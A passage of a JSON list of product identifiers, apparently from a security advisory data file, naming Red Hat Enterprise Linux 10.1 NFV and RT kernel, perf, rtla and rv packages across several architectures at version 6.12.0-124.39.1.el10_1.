"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
